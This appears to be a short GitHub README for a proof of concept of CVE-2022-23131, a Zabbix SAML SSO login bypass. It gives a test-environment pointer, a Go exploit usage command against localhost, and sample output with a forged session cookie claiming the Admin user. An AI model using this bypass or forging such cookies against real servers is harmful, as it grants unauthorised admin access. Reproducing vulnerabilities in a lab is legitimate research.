/CVE-2022-23131

Primary LanguageGoApache License 2.0Apache-2.0

Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131

Enviroment and Poc of CVE-2022-23131

Enviroment

You can create a Zabbix with SAML SSO follow the step in Zabbix Enviroment for CVE-2022-23131.

Poc

The Poc was modified from jweny

Usage:

go run poc.go check -t http://localhost:8080 -u Admin

[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9